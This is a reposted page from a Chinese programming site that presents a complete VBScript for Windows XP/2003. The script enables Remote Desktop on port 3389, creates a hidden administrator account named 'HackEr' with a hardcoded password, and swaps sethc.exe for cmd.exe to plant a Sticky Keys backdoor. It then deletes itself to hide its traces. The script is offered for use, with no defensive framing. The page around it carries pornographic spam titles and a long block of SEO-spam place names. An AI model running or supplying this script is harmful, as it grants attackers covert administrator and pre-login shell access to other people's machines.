国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > VBScript > 正文

xp、2003開3389+非net創建管理用戶+Shift后門+自刪除腳本vbs

2020-07-26 11:57:31
字體:
來源:轉載
供稿:網友

復制代碼 代碼如下:

on error resume next 
const HKEY_LOCAL_MACHINE = &H80000002 
strComputer = "." 
Set StdOut = WScript.StdOut 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_  
strComputer & "/root/default:StdRegProv") 
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp" 
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server" 
strValueName = "fDenyTSConnections" 
dwValue = 0 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue 
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp" 
strValueName = "PortNumber" 
dwValue = 3389 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue 
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp" 
strValueName = "PortNumber" 
dwValue = 3389 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue 
on error resume next 
dim username,password:If Wscript.Arguments.Count  Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath 
On Error Resume Next 
Dim obj, success 
Set obj = CreateObject("WScript.Shell") 
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F© %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe© %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True) 
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 巴里| 清新县| 当阳市| 炎陵县| 富民县| 香河县| 屏东县| 遂溪县| 农安县| 蕲春县| 阳谷县| 汶上县| 若尔盖县| 尚义县| 城市| 崇信县| 云南省| 永福县| 桃园市| 麻城市| 福海县| 扶绥县| 开化县| 子长县| 商城县| 红河县| 通州市| 桂林市| 清涧县| 普格县| 神木县| 万盛区| 武强县| 衡水市| 绵阳市| 二连浩特市| 河源市| 探索| 务川| 宜春市| 泌阳县|